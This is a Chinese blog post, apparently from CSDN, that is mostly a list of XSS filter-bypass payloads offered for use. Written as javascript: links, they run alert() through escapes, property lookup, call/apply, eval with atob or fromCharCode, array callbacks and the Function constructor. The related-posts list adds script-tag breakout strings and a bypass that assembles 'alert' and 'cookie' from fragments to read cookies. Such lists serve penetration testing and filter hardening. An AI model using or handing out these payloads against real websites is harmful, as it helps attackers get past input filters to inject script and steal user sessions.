XSS多姿势执行alert

最新推荐文章于 2024-06-04 13:39:04 发布
最新推荐文章于 2024-06-04 13:39:04 发布
阅读量6.4k 收藏 6
点赞数 3
分类专栏: Web安全 文章标签: xss js bypass
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/haoren_xhf/article/details/83060293
版权

以下归纳了多种执行alert函数的方式(前提是获得js执行上下文) ,可用于xss filter bypass

1、常规alert
<a href="javascript:alert()">XSS Test</a>

2、字符串操作
Unicode字符以"\u"开头,例如\u00A9。Unicode码位用"\u{}"表示,例如\u{2F804}
十六进制以"\x"开头,例如\xA9;八进制以"\"和数字开头,例如\251
<a href="javascript:al\u{65}rt()">XSS Test</a>
<a href="javascript:al\u0065rt()">XSS Test</a>
正则表达式返回字符串
<a href="javascript:window[/alert/.source]()">XSS Test</a>
<a href="javascript:''.replace(/.*/,alert)">XSS Test</a>
整数toString(radix)转字符串, 第一个点表示浮点数,第二个点调用函数
<a href="javascript:top[8680439..toString(30)]()">XSS Test</a>

3、window/top对象 属性调用
<a href="javascript:window['alert']()">XSS Test</a>
<a href="javascript:window[/alert/.source]()">XSS Test</a>
<a href="javascript:top[8680439..toString(30)]()">XSS Test</a>

4、函数多样调用
<a href="javascript:alert.call(null,'param')">XSS Test</a>
<a href="javascript:alert.apply(null,['param'])">XSS Test</a>
<a href="javascript:alert.bind()('param')">XSS Test</a>
参考 https://www.cnblogs.com/coco1s/p/4833199.html
<a href="javascript:Reflect.apply(alert,null,['param'])">XSS Test</a>
<a href="javascript:setTimeout`alert\x28\x29`">XSS Test</a>
<a href="javascript:eval(atob())">XSS Test</a>
<a href="javascript:eval(String.fromCharCode(97,108,))">XSS Test</a>
(function(){alert()})()
!function(){alert()}()
+function(){alert()}()
-function(){alert()}()
~function(){alert()}()
<a href="javascript:(alert)()">XSS Test</a>
模板字符串:反引号``
<a href="javascript:`${alert()}`">XSS Test</a>

5、利用数组等的功能函数
<a href="javascript:[''].find(alert)">XSS Test</a>
<a href="javascript:[''].findIndex(alert)">XSS Test</a>
<a href="javascript:[''].filter(alert)">XSS Test</a>
<a href="javascript:[''].forEach(alert)">XSS Test</a>
<a href="javascript:(new Map()).set(1,'').forEach(alert)">XSS Test</a>
<a href="javascript:(new Set([''])).forEach(alert)">XSS Test</a>

6、新建函数
<a href="javascript:(new Function('alert()'))()">XSS Test</a>
<a href="javascript:Set.constructor`alert\x28\x29```">XSS Test</a>
<a href="javascript:(new (Object.getPrototypeOf(async function(){}).constructor)('alert()'))()">XSS Test</a>

参考来源不详

深入浅出_balance
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
XSS漏洞的简介和利用
m0_46397814的博客
08-08 1237
跨站脚本攻击
跨站脚本漏洞
weixin_46729085的博客
09-08 3751
XSS漏洞 一、文章简介 XSS漏洞是Web应用程序中最常见的漏洞之一。如果您的站点没有预防XSS漏洞的固定方法,那么很可能就存在XSS漏洞。 这篇文章将带你通过代码层面去理解三个问题: 什么是XSS漏洞? XSS漏洞有哪些分类? 如何防范XSS漏洞? 二:三大分类 反射型XSS:<非持久化> 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。 存储型XSS:&...
XSS注入总结
最新发布
白帽黑客佳哥的博客
06-04 912
本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。X-XSS-Protection,即XSS保护属性,是设置在响应头中目的是用来防范XSS攻击的。如果cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到cookie信息,这样能有效的防止XSS攻击。将利用写在自己服务器上,核心是让受害者访问我们的服务器,然后触发别的网站的xss。所有能输入的地方都要试一次,有字数限制的可以在burp里改。里的时候,闭合标签会被当做代码执行
XSS插入绕过一些方式总结
热门推荐
煜铭2011
05-05 7万+
0x00前言 我们友情进行XSS检查,偶然跳出个小弹窗,其中我们总结了一些平时可能用到的XSS插入方式,方便我们以后进行快速检查,也提供了一定的思路,其中XSS有反射、存储、DOM这三类,至于具体每个类别的异同之处,本文不做学术介绍,直接介绍实际的插入方式。 0x01 常规插入及其绕过 1 Script 标签 绕过进行一次移除操作: <scr<script&g...
<scr<script>ipt>alert(“XSS“)</scr<script>ipt>
weixin_43754035的博客
11-04 301
<scr<script>ipt>alert("XSS")</scr<script>ipt>
“/><script>alert(‘xss‘);</script>
m0_53372931的博客
05-02 927
"/><script>alert('xss');</script>
XSS小结
wkend的博客
10-19 1517
XSS是什么? XSS全称跨站脚本(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。跨站点脚本(XSS)攻击是一种注射型攻击,攻击者在可信的网页中嵌入恶意代码,用户访问可信网页时触发XSS而被攻击。 XSS会造成那些危害? 攻击者通过Web应用程序发送恶意代码,一般以浏览器脚本的形式发送给不同的终端用...
xss_javaxss_XSS_
10-04
在网络安全领域,XSS(Cross-Site Scripting)攻击是一种常见的威胁,它允许攻击者通过在网页中注入恶意脚本,来劫持用户会话、窃取敏感信息或执行其他恶意操作。Java作为广泛使用的服务器端编程语言,也可能会遭遇...
关于pdf文件xss攻击问题,配置xssFilter方法
12-21
PDF文件XSS攻击问题主要指的是攻击者通过构造恶意的PDF文档,利用其中的脚本语言功能,尝试在用户的浏览器上执行跨站脚本攻击(XSS)。这种攻击方式可能导致敏感信息泄露、用户权限滥用或其他安全风险。在SpringBoot...
免费蓝莲花Bluelotus,XSS工具网安
08-14
【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】...
XSS.rar_XSS
09-22
XSS攻击允许攻击者在用户浏览器上执行恶意脚本,从而窃取用户数据、操纵用户界面或者执行其他有害操作。以下是关于XSS攻击的详细解释和常见类型: 1. **反射型XSS(Non-Persistent XSS)** 反射型XSS是通过诱使...
xss特殊字符拦截与过滤
04-01
滤除content中的危险 HTML 代码, 主要是脚本代码, 滚动字幕代码以及脚本事件处理代码
"/><script>alert('xss');</script>
fy8207345的专栏
11-13 2689
"/>alert('xss');
alert(1) to xss.haozi.me with #0x03
Annanljz
06-05 231
#0x03 题目: 这道题使用正则表达式,当 ( ) 出现在 [ ] 中时,( ) 会被当做普通括号,所以该函数会将 ( ) 替换成空,使用``模板字符串可以避免过滤 ...
xss漏洞
qq_41453632的博客
11-20 213
Xss攻击的定义: 恶意攻击者往web页面里插入恶意script代码,当用户浏览该页之时,嵌入其中的web里面的script代码会被执行,从而达到恶意攻击用户的特殊目的。 Xss攻击的危害: 这些危害包括但不局限于: 盗取管理员或者普通用户cookie,session;读取.篡改.添加.删除敏感数据; 网站挂马; 非法转账; 控制受害机器向其他网站发起攻击 ……… XSS攻击常见...
payload的使 常用xss_【XSS】 ""alert(1)""可以执行的简单分析
weixin_36299482的博客
01-01 372
漏洞场景如下所示的XSS位置,红色部分表示用户可控常见思路最常用的闭合方式就是输入";alert(1);",那么代码就变成如下,也可以输入";alert(1);//,效果一样过滤分号的场景问题来了,如果过滤了分号怎么办?一种办法是利用点号,取字符的a函数,把要执行js代码作为入参放在a函数中,即使a函数是不存在函数,js也会先执行其中的入参,payload如下过滤分号、点号的场景问题又...
xss(跨站攻击)
m0_74456293的博客
03-20 2543
xss(跨站攻击)
14.xssalert绕过&cookie绕过
HWHXY的博客
12-25 4575
前言 该篇记录为记录实际的src过程第14篇小文章,内容为某网站的xssbypassXSS 特征 拦截了常见的alert和prompt,大小写无法绕过,eval无法绕过,alert.call无法绕过 xss绕过 alert用top[‘ale’+‘rt’]绕过 alert()用top[‘ale’+‘rt’].call绕过 cookie用document[变量]绕过 最终payload <img src=\"x\" onerror=\"c='coo'+'kie';top['ale'+'rt'].c
XSS小总结
孤的博客
10-02 470
原理 开发者在开发时,对客户端过滤严格,导致恶意的javascript代码在浏览器上执行 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的...
xss中的onclick=alert()
05-14
其中,onclick=alert()是一种最基本的XSS注入方式,它会在用户点击页面上的某个元素时触发alert()函数,弹出一个警告框。这种攻击方式很容易被攻击者识别,但是如果攻击者使用更复杂的代码,就有可能造成更大的威胁...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值